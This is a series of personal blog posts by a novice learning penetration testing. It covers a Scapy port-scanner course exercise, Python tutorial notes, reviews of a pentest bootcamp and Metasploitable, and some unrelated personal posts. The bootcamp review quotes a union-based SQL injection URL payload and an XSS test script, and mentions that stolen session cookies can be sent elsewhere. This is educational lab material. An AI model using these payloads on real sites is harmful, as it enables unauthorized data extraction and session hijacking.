SPSE Multiple threading Port scanner - popped the code a decent program cherry

Hi guys, everyone who reads.

As part of the SPSE python course I was tasked with creating a port scanner with Scapy.

The script was to take user input on a range of ports, and split them up into a range of 10 equal parts, so 1-100 would be 1-10, 11-20 etc etc (its not directly even but you get the point.

Each of the equal parts would be placed into its own thread. So a port scanner seemed easy until adding the logic just mentioned. As I state in every post I am a noob at coding so I was already dropping my jaw at the task ahead.

Scapy

The plan was to learn Scapy and how to actually scan a port. Where else would you start right? I could have started with seperating the port range, but at the time that seemed much harder.

The Scapy website can be found here 

"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more." This was the description of what Scapy can do... So reading that I was like oh dear, I am already in over my head and its the 2nd exercise other than the python syntax module.... ARRGH

But remember many a time of being frustrated I calmed my breathing, settled my heart rate and pushed through. How hard can it be if I go slowly right? Right....

Sifting through the documentation was not too bad, I learn so much about what Scapy can do (it is HEAPS), but was trying to find out about how to send packets. Whoa.. Whoa, back.. I had to learn how to 'install' it first. I couldn't play with it until it was installed. Thankfully it was pretty easy. Once I had the VM's working properly.

NB: Make a post about how the VM's play naughty games on the work laptop. Like they crash all the TIME..


I found how the syntax for a SYN scan. Yay! I had installed Scapy, read through the documentation and was finally able to see the program coming together (even if only in my mind). So with that I could see that the port would be placed i dport=.

So for a range of ports I would have to create a list and place it into that syntax, so I started with dport=port.

To not jump in to deep, I started off with asking for user input for 1 port. Thinking please let this work, then I can slowly work out how to add multiple ports to that syntax.

Thankfully it worked.


For some reason the code is staying in text, not being highlighted in python syntax. Sorry for that!
As you can see its a bit of code.

Multiple threading

My first thoughts were let us try to get 2 threads working. Then I can try more. But after having changed it into a for loop there was no need to have multiple threads written manually. The number of threads that would be created was determined by the number of times it looped through creating the code. This was a bit of a logic shift but worked well.

The plan for manually writing the threads first up was to make sure I had my logic down and could create more than one thread correctly, i.e the syntax was correct and it would actually work!

To thread or Threading

So like, in the video we were told to create threads using thread. This is apparently an older way to create multiple threads. There is a new way called Threading, notice the difference? Neither did I. But it works!

It is also much easier. from Threading import thread. Totally different to the original... Anyhow I struggled using thread (the old way) until I did some research and found out about Threading (new way). It is much more humand readable, such as target= and args. Much easier to understand.

So if you are looking at multi threading, use THREADING not just thread.

Extra on the code

Some simple things had to be checked. Such as creating a range 1-100 would be 1-99 in python, so I had to +1 on user input for the end range of ports.

Placing Start and Stop for each loop allows the user to understand the results from each packet received. I am yet to make it easier to understand, as I do not fully understand the Scapy output, I may one day. But as this was completed for the exercise and will not be used to much (yet to see) I doubt I will improve it much more. It satisfies the exercise and that makes me very happy!


The output frome the code is as follows:

Asking for port range

Scapy Processing

Some output from the SYN scan:


























NB: There was an update suggested by a friend to the part of slicing the list up. Which I will implement but haven't yet.

Hope you guys like???

Cheers
Haydn.,

SPSE update - Recursive function

Hi all, just a post to myself and to the public to update on how I have been tracking.

Also to grab onto the many bits of pieces of information bouncing around my brain. Tracking them down so I do not lose i all!

SPSE Recursive Function

So Module 2 Video 1 asks you to complete an exercise. This exercise is to create a python file that recursive searches a directory and prints them out in a hierarchical format.



The following is the code I ended up with

Linking code in a blog can be found here https://gist.github.com/
There is a way through javascript however to directly embed it, I do not have time so this is it for now. It worked but was not able to find the python version.

Anyhow..

First off I had no idea what a recursive function was, so I was able to simply use a loop to go through os.listdir() of all the directories.

A recusive function as I understand from friends telling me about recusrive factorial funtions, is that it is one that hands itself back to itself. Great english hey.

By that I mean at the end of the function (loop, if, whatever) it passes the value back into the value being called in function. So if a function used 5 as its value and took 2 away it would then return the value 3 to the function and it would minus 2 again.

This could happen forever but the function does need a limit/stopping point (termination condition) as well as a reduction factor to allow it to reach that stopping point.
Here is some good suggestions http://stackoverflow.com/questions/479343/how-can-i-build-a-recursive-function-in-python


The following is code that has no termination condition. It would simply loop with the words hello world incrementing the number



Back to the recursive function at the top.

My biggest problem was trying to get os.listdir or os.walk to continue printing the items out without looping back over the directories.

So I wanted  code that would list the directories and paths together, so I needed something to store what directories and files had been looked over so that it could be recursive and send that information back to itself. This was to be stored in the newdir array/list. As then it could choose that as the new directory and continue from there.

It would have been START directory do loop find A directory with A file in it. Then it starts over and start directory is now A directory. if no more directories this is not passed to the start of the function again. Making it clear the termination factor (became clear now I have written it).



The above is to do with os.walk . This is the easy for loop for printing out a directory and files. This walks through all the directories and sub directories. My trouble is with the dirtrav code I am unsure how it walks subdirectories. I have tried for loops with os.listdir but was not able to go into subdirectories. This really frustrated me.

I broke the dirtrav code apart and understand how and why and what it was doing, but still unable to see why. If you delete the for f in newdir loop it does not print out the files within subdirectories, so it must do something there.

**NB get javascript embed code to work, so annoying creating it externally, going into html edit and pasting then coming back out.

Simply I Googled code to see if there was any starting points to give me an idea and it came up with the top code, so I spent much time working out different ways to make it recursive. But using the array/list gives a very simple termination factor without using integers, says num -1 for example. As it is to do with directories and there can be a different amount of them the stopping based on the intergers would never be suitable.

Code output when dirtrav(f) is not deleted

When dirtrav(f) is deleted, not sent back to itself.

So you can clearly I have not fully understood the code.

EDIT:!! So as it passes f back into dirtrav. it doesnt print the directory because there is none. it prints the file names... *facepalm*



Hopefully this helped some people out.
Cheers
Haydn

Getting Fat, Being Lazy and all things I wish I wasn't

Hi Everyone! How are you guys doing?

This post is to remind myself to get back on the wheel of 'life' and continue running instead of walking.
I.E Taking responsibility for what I eat, what I do, how I study.

Each day is gone, disappeared. It flies through without me having much control. I have been holding on for the ride. I assume many people do these days, or at some point in their life become stagnant like myself. But I have decided NO MORE.

Plan to no be 'Fat'

I am not fat in the sense of being obese, or not fitting any old jeans anymore. I am fat in that I have grown a bit of a belly, my cardio is not as it used to be, by that I mean non-existent. Drilling at Jiu Jitsu is not the pleasure of pain it used to be, it is now all fours on the ground gasping for air at the end. Being drained and knowing you have pushed through a barrier verse fighting with your fitness is very different.

Plan to study properly  - paying attention

I am finding I am either not as smart as I once was (many would argue I never was) or my attention is not as strong.

Completing through the SPSE (securitytube python course) is taking much longer than I thought. The time I do get to study is not being as fruitful as I first thought. I flick to Facebook too easily, I fight trying to install Ubuntu on virtual box and vmware player, though that can be justified to virtual box running like a snail.

It just seems that the speed at which I used to learn in year 9 has dramatically slowed. I used to be so attentive, the student with the hand up first to answer the question (at risk of being bullied). Now it is like study or waste time. Generally the waste time option wins.

I know I know, its not good for my future, I want to be a pen tester and to do that as a job I need to do a certain amount of hours, if I want to be better at anything I must put in the time. I know all this, but execution is my downfall, I am like the person that knows the best technique to do anything, I just don't...

I want to stop this!

Each day, what where?!

Days go bye. over and over. I have been at my graduate job almost 4 months now, amazing. I am so happy I have passed my probationary period. Things go by so quickly. I have been really bad in routines.

My training routine for Jiu Jitsu (more mental than on paper) has stopped. Last week I only got to training once last week! So so so bad of me.


From here we go up

As I am sure everyone has troubles like this, I am attempting to catch it before it gets really bad.

Mondays at work I am planning to get to Jiu Jitsu for lunch and afternoon, that would be amazing. I only have to stay back a little bit later or start a bit earlier. Since Jits is at 6 30pm its quite easy to do. I want to add in more weight training at some points.

For study, I am going to make a plan for each session, even if 30mins, what am I doing it for, what is the focus etc etc.

My weight.. Hmm my weight, hopefully Jitsu takes care of that, but I am going to employ Lite n Easy I think. The last thing I want to do is go home and have to cook, some people love cooking and it relaxes them, but that is just not for me.

So that is the plan so far?! Let me know if you guys have any tips and tricks. Like I said earlier I am great at googling, using websites, having the knowledge, but execution lacks..

Hopefully this post kicks my but!

Cheers
Haydn

Python Plans + Tuesday - is worse than Monday

Tuesday Mornings....

The day is not horrible. The day is great. The horrible thing is leaving your nice warm bed while being cuddled by 2 big dogs.

I hit the snooze button so many times that 30 minutes passed. I am lucky I always get an early train for the reason of sleeping in. Good planning I say!

I had an hour + train ride, was great to sleep!

Anyhow to the real reason for the post

Python! Specicially SPSE - More Specifically Security Python Scripting Expert.

In my plan to gain practical skills while at full time work. i plan to complete the above course from http://www.securitytube.net/

The course link is here.

Now if you have read any previous posts, you must know that I have a love-hate relationship with programming. More so I am too stupid to learn it. Anyhow, in my last post I was completing my way through learnpython.org and stopped at generators. I thought having the basics down would be a great time to start the SPSE course.

The first module of the course is a quick run through the syntax. A very quick run through I might add. So if you plan on attempting this course, please do have basics of Python, or have the time to learn it as you, which is what I plan to do.

Module 2 so far is reading and writing files. Which I assume will  be used quite often during the course. There is an exercise to write code that reads out all directories and files back to you. Pretty nifty, pretty awesome, and if you do not do it correctly it prints out in an incomprehensible way. So newline is a good thing to put.

So I plan to complete the SPSE course, originally by the end of June (12 days left), but now end of JULY I HOPE!. I need to finish it.

Cheers,

Haydn

Sunday night sleep - bed space

This post is not IT related. It is to express the little bed space I normally sleep with.

My German Shepherd X and my Rottweiler take up a fair chunk of the bed.

The missus is not here so thankfully I have some room :)

How do you guys sleep?

This was also to test out blogger on my phone. Here are 3 photos to go with it. My eyes are burning from the flash....

Cheers
Haydn

Saturday Study - very little, a fight to learn something basic

How Saturday started

Like everyday I have big plans for learning on the weekend.
Like most Fridays I stay up late watching youtube videos..

The Result = waking up late and having little motivation!! Does anyone else sympathize?

Python
My plan for today was to learn some python. I have a long hate relationship with coding, so python is my way to force it into a friendship

I have been going through www.learnpython.org, which is a great free interactive python tutorial websites. Lots of tutorials great for beginners like me!!!

So I have been plowing along, and come to the functions section. All nice and easy, but wait functions within functions and then a 3rd function call the prior 2, of which the 2nd would add a string onto the result of the first function. Complicated enough for you? Don't worry I was like "draw drop".

Anyhow good news I passed it... After being like wtfomgbbq.

 The exercise was:

Exercise

In this exercise you'll use an existing function, and while adding your own to create a fully functional program.

1. Add a function named list_benefits()- that returns the following list of strings: "More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together"
   
2. Add a function named build_sentence(info) which receives a single argument containing a string and returns a sentence starting with the given string and ending with the string " is a benefit of functions!"
   
3. Run and see all the functions work together!
    

 self note: OMG the copy paste works amazing in BACKTRACK


# Modify this function to return a list of strings as defined above
def list_benefits():
    pass

# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
    pass

def name_the_benefits_of_functions():
    list_of_benefits = list_benefits()
    for benefit in list_of_benefits:
        print build_sentence(benefit)

name_the_benefits_of_functions()

in which the answer was

# Modify this function to return a list of strings as defined above
def list_benefits():
    return ("More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together")
# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
    return benefit +" is a benefit of functions!"

def name_the_benefits_of_functions():
    list_of_benefits = list_benefits()
    for benefit in list_of_benefits:
        print build_sentence(benefit)

name_the_benefits_of_functions()

Now the red + sign was the hardest part. Like the answer looks obvious and bloody easy.

I originally had  the function 

# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
    return benefit ," is a benefit of functions!"

Now having a  "," instead of a + gives a massively different ouput.

Instead of the first function string having the 2nd function string concatenated together  which you think would happen. It turns into a bloody tuple!!  As a beginner I was stunned, that was the omgwtfbbq moment, over and over I could only get the tuple printed out, it would include both strings with brackets around them with single quotes. So a tuple of the objects, instead of the objects. Not sure if I used the correct terminology.

So you can see the difference. Which seems quite obvious, but to a begginer the trials and tribulations to understand it was not obvious. I asked a good friend on Facebook for advice, he is much more skilled and established than I.

Hopefully this post helps other noobs to understand that many simple things will make you *facepalm* yourself when you figure it out...

Cheers Haydn

2nd Day - 2Day beginners Pentesters Boot Camp Weekend

Hi all,

So I did the 2nd day of the course. The focus on web applications. Yay some stuff I knew! Because I have some grounding in the area I feel more in a position to give a balanced review of the 2nd day. Not to say I didn't give a balanced view of the 1st day, but I can give a better idea if it was beginner or not.

2nd Day Review

The course was to go through basics of XSS and SQLi and some Burpe Suite.


Copy & Paste from Day 1
----The course was through strategicsec with Joseph Mcray whose twitter is @j0emccray, having to manually link it because the Twitter could not find him.. The website/company he runs is http://strategicsec.com/.

Pentesters Weekend Bootcamp:
http://strategicsec.com/services/training-services/online/pentesters-workshop/----

SQL Injection

The SQLi was very basic, but it came with strong explanations. I even learnt when testing for SQL there is a difference between placing a quote for order by and not placing a quote. Answer being integers do not need the quote and string do, in order to escape to test it.

The instructor covered blind sql injection, basic sql injection and union based injection. He did this in a step by step approach, allowing your understand to be stretched appropriately. He even explained time based injection with a demo, although he did not spend much time on this I think it may have been to advanced for the course.

So ultimately the most advanced it went was union select, using the order by to find the number of columns first. Then in one of the  columns that would show on screen we could extract data, such as @@database, user() etc etc. With the line in the URL bar being: ?id=1' union select 1,2,3,4, @@version --+

Not sure of the exact number of columns but you get the idea.

It did not go much more advanced than that, there was no explaining that all tables in a sql database are kept in the information_schema section, or columns in information_schema.columns, allowing further information extraction.

So in having a background, the SQL was a refresher for me, however I think it was suitable for the course and was explained quite well. Leaving enough out for students to go research themselves.

If any other students are reading this; a great free sql tute with videos is SQLi-labs by Audi-1.
It is run through PHP in Apache within whatever OS you set it up with. I did it in backtrack worked a treat.
https://github.com/Audi-1/sqli-labs


XSS

<script>alert(123)</script> was shown in a webpage that was specifically vulnerable to XSS. This will be great for students to play around with and see what can be done. Was the basics as well, very suited to the class.

The result of what XSS can do other than just a pop up I found was really important. A webpage where the XSS would send information too was able to be accessed. So as simple as seeing that session cookie information could be sent somewhere else was really great. Especially when as a Penetration Tester we must explain the outcome of a vulnerability, this was great to see.

Burpe Suit
Unfortunately this was not gone through, we finish and hour and a half early, so I am not sure why. However we were informed that another session would be made available before the end of the month. Hopefully this is true. I will come back and update if this is covered

I understand it was only $100, but the course description covers it and its a paid service. Other than that the course was great, delivered well, the course material was supplied.


Update: There is going to be another day added to the course, this is to cover the Burp Suite and LFI that were missed originally. This is great news, as it shows the instructor cares about what we learn and what he sets out to do, also keeping to his work (aka the course description). So more time covered on the original topics and extra time for those that were missed, is a win win for me.

The Labs + Virtual Machines
Having played with the labs a bit, for the web app side it includes vulnerable web pages which is really great for beginners (like me) to play around with.

The virtual machines given were customed xp, windows 7 and ubuntu, working really great so far!

I would certainly recommend this course. I need to upskill in the network scanning so I can test that out a bit more. But a fantastic course.

Cheers guys

2 Days Beginners Online instructor lead course - Review

Hi everyone,

Sorry for no post since Wednesday. The week flew! You know those weeks you wake up Monday dreading it, each day is a struggle, then bang its the weekend, and already the weekend is almost over?? Yeah.. one of those weeks.

So I have been very excited to do this $100 (yes that was the price!) course, that has 2 days of 5 hours instructor lead on network scanning and web application testing. It also comes with lab access until the end of June. Fantastic for $100 bucks I say.

The course was through strategicsec with Joseph Mcray whose twitter is @j0emccray, having to manually link it because the Twitter could not find him.. The website/company he runs is http://strategicsec.com/.

Pentesters Weekend Bootcamp:
http://strategicsec.com/services/training-services/online/pentesters-workshop/

So this course I signed up for seemed great, I even posted on twitter asking if it was for beginners and was told it was. Was the course for beginners you may ask? Definitely yes, but also no. No because holy moly there was some stuff that was over my head, but in saying that there is no point doing a course to learn what you already know.

It was a little over my head, but you have resources to go through later, the instructor lead time is recorded and given to you, so you can go back rewind, pause, rewind again (I am sure I will do that many times) and follow along at your own pace.

Different Topics
We covered many topics for Networks. External scanning, internal scanning, Metasploit and lots of other stuff. Additionally what to do once into a system, such as creating administrator rights.

 Http load balancing and what to do if that is the case was great to see, it was important to understand what to do before you even compromise a system. As this can save so much time over just pot shotting off into know where trying to compromise.

The instructor Joseph was friendly and involved the online students interactively, we finished and hour and a half early because there was not as many questions as normal. Which is a good thing, allowing so much time for student questions and interactivity really makes the day stand out.

Death by power point?
The well known death by power point was avoided, a mix of powerpoint and live demo's was used. The live demos were run through very quickly, although it probably only felt that way because for us Aussies it was Midnight- 5am, a hard time to focus at the best of times. However in saying that the presentation was recorded, the magic notepad he used for all the commands were to be supplied as well.

So over all a great first day (night for me). I have not had experience with other instructor lead webinars before, but have youtubed many a course. So far I already feel the $100 is great value. It will be most worth it if I make use of the labs as much as possible.

Look forward to tonight's web app section!!

Hope you enjoyed my quick review.

Cheers
Haydn

Metasploitable - dislike! Hard for newbie to learn

Hi Guys,

Just a quick post while I am on the train to work, yes work, so much fun! Actually hopefully I can finish this work paper today and then get more involved on a source code review, fingers crossed.

Anyhow this post is about my dislike for the Metasploitable documentation, especially coming from a newbiew.

I will cut to the chase and say its because most of the stuff they do and show in the documentation DOES NOT work on the VM. Why have all this documentation that is supposed to be specific to the vulnerable Vm that they specifically MADE and not have it directly link to the VM.. ungh so silly and so frustrating.

It would be like having a bowl of soup and trying to eat with a fork.. Pointless. Bad analogy I know, I am very bad at them.

This problem happens from early on, by early on I mean I did not bother going past information gathering. How bad is that! Or perhaps lazy of me to see if the documentation got better.

Now the documentation explains how to use a password sniffer, which is great, but if you use it on the VM it fails, it barely gives any output of feedback in the terminal. So I must assume it did not find a password. Then SNMP sweeping is not worth going through either. The beautiful and useful output in the screenshots which is great for learning I might add, is not able to be replicated in the VM. Which is terrible, I like to be tactile and learn by DOING. but no you can't.

Being a newbie and having no direct path for ethical hacking coming across the metasploitabke documentation was too good to be true. So far it is! No direct path is great in that you are free to learn what you choose and find what is relevant for you, however no path at all creates a big opening to spend more time searching than learning (which I have done quite a lot). As such I am finding you need a great passion and great persistence with learning for this industry.

So I appear to have come to a love hate relationship with the Metasploitable documentation, it can give you a taste of how to, but not directly onto the VM, so perhaps it is worth googling and playing around, which is the idea of 'hackers' hey. If it was easy, everyone would do it!.


Hope this comes as a warning for newbies who wish to jump in on Metasploitable. Good Luck!... and be patient

Cheers
Haydn

Sunday Night Metasploit-ing

 Hi all, so I began sitting down and going through the Information Gathering part of Metasploitable, very interesting, very much over my head. Oh well, you have to learn somehow, right?

Issue with Metasploitable: Thing I find with Metasploitable, being so new is that they do not test on the actual VM. It will be random ip addresses, many which are multiple. I know this because the default IP address for metasploitable is 192.168.56.101. I proceeded anyway, and just put in the VM IP, it is good though to see how it works with multiple IP's.

It would be so great if it was the VM that all the documentation was taken on. That way if something goes wrong, I can quickly see if its my misunderstanding (which I am sure happens alot!) or something else.


 So here I have just completed, gone through quickly, not a full understanding of the information gathering section.

Information Gathering:

This I understand is a very important skill for pen testing/hacking, or whatever you wish to do. Research is really important for anything really, it allows you to understand what you have, what you could do or want to do and really 'prepare'.

It saves heaps of time in the long run, like LOADS. A lame analogy I have come up with is a locked box, spending ages trying to break the lock, when if you have looked around it first you would have seen the button to open it. Lame I know, but gets to the point really quickly.

So Metasploitable takes you through many but not all (as it states) of the different ways to scanning. Starting with the popular NMAP, through to SSH, TCP and FTP.

Most basic fundamentals that I think most of everyone has, but good for me to go through again.

So as I frantically go back to the website to remember what I did, the first page was Port Scanning.

Port Scanning
In order to talk to someone, you must agree on the form of how to interact and it is generally speaking. Just like humans, applications and networks require an accepts way to interact, this is generally done via ports, by generally I mean it is a requirement. This helps uniquely identify the application that wants to communicate.

So perhaps I used a bad analogy. But the idea is in there sort of. A better one after writing I have come to think of, its like a 2 way radio, unless you are on the same channel you cannot communicate. You could be communicating with some random person and not realize..

Nmap was used first up. I understand it is very popular, and many to many the scanner of choice

I do not fully understand the syntax, but it is on my to do list. I have the hakin9 magazine devoted to it, which I plan on reading on the commute to and from work.This hopefully amazing magazine can be found at
http://hakin9.org/tag/hakin9-nmap/

Metasploit quickly runs you through nmap, and then allows you to save it to db_nmap to go into the Metasploit server, which is really useful.

I learned that running a really wide scan will either crash what you are scanning or stop your internet connectivity altogether.I am unsure if this is due to Backtrack being run in a VM, but when I scan just the IP on the Metasploitable VM nothing crashes :).

Other types of scans within the Msfconsole:
Pages I am writing about here

 I learned to scan SNMP devices, ftp and ssh

All can be found at

(manually typing because Blogger copies and pastes the text as it is in the web browser, but does not allow me to get back to my normal font and size?!?)

msf> use/auxillary/scanner/<scan type>

This is really useful, very basic for a noob like me to understand.

Simply typing show options is beautiful!

Metasploit does not explain in too much depth why you need to scan, but then it would be called 101 scanning and not a Metasploitable tutorial. It really shows the flexibility of it, and the easy of use.

My posts are getting extremely long quickly, so I will stop here.
Not much info, more like a review, but helps me quite immensly.

If you like reading let me know, if not let me know WHY :).


 Note: Maybe I should start thinking about why I want to do each blog, the aim etc. That way I do not ramble on!

Cheers
Haydn